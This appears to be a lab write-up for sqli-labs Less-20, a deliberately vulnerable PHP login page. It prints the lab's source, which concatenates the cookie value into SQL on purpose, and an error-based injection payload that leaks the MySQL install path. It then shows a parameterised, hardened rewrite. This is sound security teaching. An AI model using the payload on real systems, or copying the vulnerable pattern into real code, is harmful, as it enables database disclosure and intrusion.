sqli-labs: Less 20

Less-20

[Screenshot 1]

Here we run a simple login test:

username:admin

password:aaa

[Screenshot 2]

The response above echoes the User-Agent and the COOKIE contents back to us. Let's look at the source code to see what is actually happening:

The page is titled "Less-20 Cookie Injection- Error Based- string" and greets the visitor with "Welcome Dhakkan". With the HTML presentation stripped out, the PHP logic of the lab is as follows (it targets the legacy mysql_* extension, which was removed in PHP 7, so it only runs on PHP 5):

```php
<?php
// Less-20 Cookie Injection - Error Based - string (sqli-labs)
// The database connection is opened by an include of the lab's connection
// script, which is not part of this dump.
error_reporting(0);

function check_input($value)
{
    if (!empty($value)) {
        $value = substr($value, 0, 20); // truncation (see comments)
    }
    if (get_magic_quotes_gpc()) { // Stripslashes if magic quotes enabled
        $value = stripslashes($value);
    }
    if (!ctype_digit($value)) { // Quote if not a number
        $value = "'" . mysql_real_escape_string($value) . "'";
    } else {
        $value = intval($value);
    }
    return $value;
}

if (isset($_POST['uname']) && isset($_POST['passwd'])) {
    // Login: both POST fields go through check_input() before they reach SQL.
    $uname  = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
    $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    $cookee = $row1['username'];
    if ($row1) {
        // Successful login: the username is stored in a plain cookie and the
        // browser is redirected back to this script.
        setcookie('uname', $cookee, time() + 3600);
        header('Location: index.php');
        echo "I LOVE YOU COOKIES";
        //echo 'Your Cookie is: ' .$cookee;
        print_r(mysql_error());
    } else {
        //echo "Try again looser";
        print_r(mysql_error());
    }
} else {
    if (!isset($_POST['submit'])) {
        // Follow-up request: the username is taken straight from the cookie.
        $cookee = $_COOKIE['uname'];
        $format = 'D d M Y - H:i:s';
        $timestamp = time() + 3600;
        echo "YOUR USER AGENT IS : " . $_SERVER['HTTP_USER_AGENT'];
        echo "YOUR IP ADDRESS IS : " . $_SERVER['REMOTE_ADDR'];
        echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE";
        echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
        // The cookie value is concatenated into the query without check_input(),
        // and any MySQL error is printed to the page.
        $sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
        $result = mysql_query($sql);
        if (!$result) {
            die('Issue with your mysql: ' . mysql_error());
        }
        $row = mysql_fetch_array($result);
        if ($row) {
            echo 'Your Login name:' . $row['username'];
            echo 'Your Password:' . $row['password'];
            echo 'Your ID:' . $row['id'];
        }
    } else {
        // "Delete Your Cookie" button: $row1 is undefined in this branch, so the
        // cookie is overwritten with an empty value and expired.
        echo " Your Cookie is deleted";
        setcookie('uname', $row1['username'], time() - 3600);
        header('Location: index.php');
    }
    //header ('Location: main.php');
    //logging the connection parameters to a file for analysis.
    $fp = fopen('result.txt', 'a');
    fwrite($fp, 'Cookie:' . $cookee . "\n");
    fclose($fp);
}
?>
```
From the source we can see that after a successful login the username returned by the query is written into the uname cookie. On the next request (one without a POST), the script reads $_COOKIE['uname'] directly into `SELECT * FROM users WHERE username='$cookee' LIMIT 0,1` without passing it through check_input(), and any MySQL error is printed back to the page via die() and mysql_error().

So once we have logged in, we can modify the cookie; on the next refresh the SQL statement changes accordingly. Here the cookie is edited with the Tamper Data extension:

Cookie:

uname=admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#

[Screenshot 3]

The screenshot shows that the error message discloses the MySQL installation path (the value of @@basedir).
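Two things make the extraction above possible: the cookie value is concatenated into the query unescaped, and the driver's error text is echoed to the client. The following is an added example (not sqli-labs code) of the cookie lookup rewritten with mysqli so that neither holds. It assumes a mysqli connection to the lab's `users` table with mysqlnd available for get_result(); the connection parameters are placeholders, and the function names are our own.

```php
<?php
// Added example, not sqli-labs code: the Less-20 cookie lookup with the cookie
// value bound as a parameter and database errors kept out of the response.
// Connection parameters are placeholders for the lab's `security` database.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$con = new mysqli('DB_HOST_PLACEHOLDER', 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER', 'security');

// Look up the user named in the cookie with a bound parameter. The value is
// sent to MySQL as data, so quotes, '#' comments and extractvalue() inside it
// never become part of the statement.
function lookup_user_by_cookie(mysqli $con, string $uname): ?array
{
    $stmt = $con->prepare('SELECT id, username FROM users WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $uname);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Issue the cookie so page scripts cannot read it and it is only sent over
// HTTPS (options-array form of setcookie, PHP 7.3+).
function issue_login_cookie(string $username): void
{
    setcookie('uname', $username, [
        'expires'  => time() + 3600,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

if (isset($_COOKIE['uname'])) {
    try {
        $row = lookup_user_by_cookie($con, $_COOKIE['uname']);
    } catch (mysqli_sql_exception $e) {
        // Log server-side only. Less-20 prints the driver message with
        // print_r(mysql_error()) / die(...), which is what surfaces @@basedir.
        error_log('cookie lookup failed: ' . $e->getMessage());
        $row = null;
    }
    if ($row !== null) {
        // Do not echo the password column back to the client as the lab does.
        echo 'Your Login name: ' . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8') . "\n";
        echo 'Your ID: ' . (int) $row['id'] . "\n";
    } else {
        echo "Unknown cookie; please log in again.\n";
    }
}
```

The bound parameter closes the injection, but a cookie that carries the username in clear is still a forgeable credential: anyone who sets uname=admin is treated as admin. A random session identifier issued by the server (PHP's session handling, or an HMAC over the cookie value checked before the lookup) is the design change that removes that second weakness.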
